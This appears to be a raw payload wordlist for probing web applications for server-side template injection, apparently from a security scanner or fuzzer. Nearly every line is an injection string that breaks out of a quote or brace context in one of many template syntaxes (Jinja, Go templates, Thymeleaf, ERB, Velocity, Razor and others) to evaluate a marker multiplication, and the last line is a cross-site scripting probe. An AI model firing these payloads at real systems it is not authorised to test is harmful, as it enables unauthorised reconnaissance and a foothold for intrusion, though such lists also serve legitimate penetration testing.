'}dfb{{"abc"|title}}xca
'print("dfb" . 98991*97996 . "xca")
'98991*97996*98991*97996
'}dfb{@math key=98991 method="multiply" operand=97996/}xca
'}}}dfb{{{this}}}xca
'}#{98991*97996*98991*97996}
'}dfb#{xca}=123
'}}dfb{{'abcd'.toUpperCase()}}xca
'}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA
'}}dfb{{98991*97996}}xca
'}dfb[[${98991*97996}]]xca
'dfb__${98991*97996}__::.x
'}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1}}dfb{{98991*97996}}xca
1%}dfb{{98991*97996}}xca
1}dfb{98991*97996}xca
1}dfb${98991*97996}xca
1}dfb#{98991*97996}xca
1}dfb{#98991*97996}xca
1}dfb{@98991*97996}xca
1}}dfb{{=98991*97996}}xca
1)dfb@(98991*97996)xca
1%>dfb<%=98991*97996%>xca
1}dfb#set($x=98991*97996)${x}xca
1}dfb{{"abc"|title}}xca
1print("dfb" . 98991*97996 . "xca")
198991*97996*98991*97996
1}dfb{@math key=98991 method="multiply" operand=97996/}xca
1}}}dfb{{{this}}}xca
1}#{98991*97996*98991*97996}
1}dfb#{xca}=123
1}}dfb{{'abcd'.toUpperCase()}}xca
555<script>cb7d(9793)</script>